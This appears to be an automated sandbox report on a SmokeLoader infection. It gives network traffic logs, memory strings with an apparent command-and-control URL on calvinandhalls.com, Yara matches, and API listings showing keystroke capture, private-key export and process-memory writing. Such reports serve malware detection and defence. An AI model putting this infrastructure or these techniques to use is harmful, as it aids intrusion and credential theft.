68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:38:27 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:39:34 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:39:36 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:39:40 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:39:47 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:39:56 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:40:09 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:40:24 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:40:46 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:41:09 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Source: explorer.exe, 00000002.00000000.1506409569.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1506409569.00000000091FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: explorer.exe, 00000002.00000000.1506409569.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1506409569.00000000091FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: explorer.exe, 00000002.00000000.1506409569.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1506409569.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1506409569.00000000091FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: explorer.exe, 00000002.00000000.1504585767.0000000004405000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ns.adobeS
Source: explorer.exe, 00000002.00000000.1506409569.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1506409569.00000000091FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 00000002.00000000.1506409569.00000000090DA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: explorer.exe, 00000002.00000000.1504054456.0000000002C80000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1505677351.0000000007710000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1505690894.0000000007720000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000002.00000000.1506409569.0000000009237000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.c
Source: explorer.exe, 0000000B.00000003.2401255932.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, EE52.tmp.11.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: explorer.exe, 00000002.00000000.1508355661.000000000BC80000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
Source: explorer.exe, 00000002.00000000.1508355661.000000000BC80000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000002.00000000.1508355661.000000000BC80000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOSA4
Source: explorer.exe, 00000002.00000000.1508355661.000000000BC80000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOSd
Source: explorer.exe, 00000002.00000000.1504995292.000000000702D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000002.00000000.1506409569.00000000090DA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0E948A694F8C48079B908C8EA9DDF9EA&timeOut=5000&oc
Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1506409569.00000000091FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 00000002.00000000.1506409569.00000000091FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.com
Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg
Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svg
Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsi
Source: explorer.exe, 0000000B.00000002.2429108620.0000000000D58000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2429108620.0000000000DC1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2429108620.0000000000DD6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://calvinandhalls.com/
Source: explorer.exe, 0000000B.00000002.2429108620.0000000000D58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://calvinandhalls.com/WN/
Source: explorer.exe, 0000000B.00000002.2429108620.0000000000DC1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://calvinandhalls.com/application/x-www-form-urlencodedMozilla/5.0
Source: explorer.exe, 0000000B.00000002.2429108620.0000000000D81000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://calvinandhalls.com/earch.php
Source: explorer.exe, 0000000B.00000002.2429108620.0000000000D58000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2429108620.0000000000DC1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.2385078500.00000000011A9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3874970360.0000000000C87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3874368668.00000000006C9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3874757842.0000000000B07000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.3873766554.0000000000E29000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://calvinandhalls.com/search.php
Source: explorer.exe, 0000000B.00000002.2429108620.0000000000D81000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://calvinandhalls.com/search.php=
Source: explorer.exe, 0000000B.00000002.2429108620.0000000000D58000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.2385078500.00000000011A9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3874970360.0000000000C87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3874368668.00000000006C9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3874757842.0000000000B07000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.3873766554.0000000000E29000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://calvinandhalls.com/search.phpMozilla/5.0
Source: explorer.exe, 0000000B.00000002.2429108620.0000000000D93000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://calvinandhalls.com:443/search.phpt
Source: explorer.exe, 0000000B.00000003.2401255932.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, EE52.tmp.11.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT
Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark
Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k
Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k-dark
Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBA
Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBA-dark
Source: explorer.exe, 0000000B.00000003.2401255932.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, EE52.tmp.11.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: explorer.exe, 0000000B.00000003.2401255932.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, EE52.tmp.11.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: explorer.exe, 0000000B.00000003.2401255932.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, EE52.tmp.11.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: explorer.exe, 0000000B.00000003.2401255932.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, EE52.tmp.11.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: explorer.exe, 0000000B.00000003.2401255932.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, EE52.tmp.11.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: explorer.exe, 00000002.00000000.1508355661.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com
Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA11f7Wa.img
Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1b2aMG.img
Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1bjET8.img
Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hGNsX.img
Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAT0qC2.img
Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBNvr53.img
Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBYTL1i.img
Source: explorer.exe, 00000002.00000000.1508355661.000000000BC80000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://java.co
Source: explorer.exe, 00000002.00000000.1508355661.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.com
Source: explorer.exe, 00000002.00000000.1508355661.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.comer
Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://upload.wikimedia.org/wikipedia/commons/thumb/8/84/Zealandia-Continent_map_en.svg/1870px-Zeal
Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000002.00000000.1508355661.000000000BDF5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/EM0
Source: explorer.exe, 00000002.00000000.1508355661.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.com48
Source: explorer.exe, 0000000B.00000003.2401255932.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, EE52.tmp.11.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: explorer.exe, 0000000B.00000003.2401255932.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, EE52.tmp.11.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-b
Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-it
Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/the-big-3-mistakes-financial-advisors-say-that-the-1
Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-al
Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/vi
Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/sports/other/predicting-what-the-pac-12-would-look-like-after-expansion-wi
Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-world
Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/sports/other/washington-state-ad-asks-ncaa-for-compassion-and-understandin
Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/accuweather-el-ni
Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/first-map-of-earth-s-lost-continent-has-been-published/
Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/stop-planting-new-forests-scientists-say/ar-AA1hFI09
Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINt
Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com:443/en-us/feed

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 23.145.40.164:443 -> 192.168.2.8:49726 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49745 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49748 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49749 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49750 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49757 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49759 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49761 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49763 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected SmokeLoader

Source: Yara match	File source: 0000000F.00000002.3873306436.0000000000351000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3873767397.0000000000C21000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 1996, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 7144, type: MEMORYSTR
Source: Yara match	File source: 7.2.4470.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.4470.exe.2160e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.fihcrfb.6d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.fihcrfb.6c0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.4470.exe.2170000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.fihcrfb.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1520190033.0000000002191000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1809368934.0000000000600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2067865752.0000000002430000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1520136328.0000000002170000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2358792511.0000000002191000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1809608817.0000000002191000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2067913469.0000000002451000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.2301467371.00000000006D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.2015538177.0000000002170000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2357485179.00000000006D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 16_2_00AD162B GetKeyboardState,ToUnicode,

16_2_00AD162B

Source: C:\Users\user\AppData\Local\Temp\354F.exe

Code function: 9_2_00007FF780B63220 CertGetCertificateContextProperty,CryptAcquireCertificatePrivateKey,CryptGetUserKey,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,CryptExportKey,VirtualProtect,VirtualProtect,CryptAcquireContextA,CryptImportKey,OpenSCManagerA,OpenServiceA,QueryServiceStatusEx,OpenProcess,ReadProcessMemory,ReadProcessMemory,WriteProcessMemory,NCryptExportKey,CertOpenStore,CertAddCertificateLinkToStore,CertSetCertificateContextProperty,PFXExportCertStoreEx,PFXExportCertStoreEx,

9_2_00007FF780B63220

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000000.00000002.1520190033.0000000002191000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000004.00000002.1809368934.0000000000600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
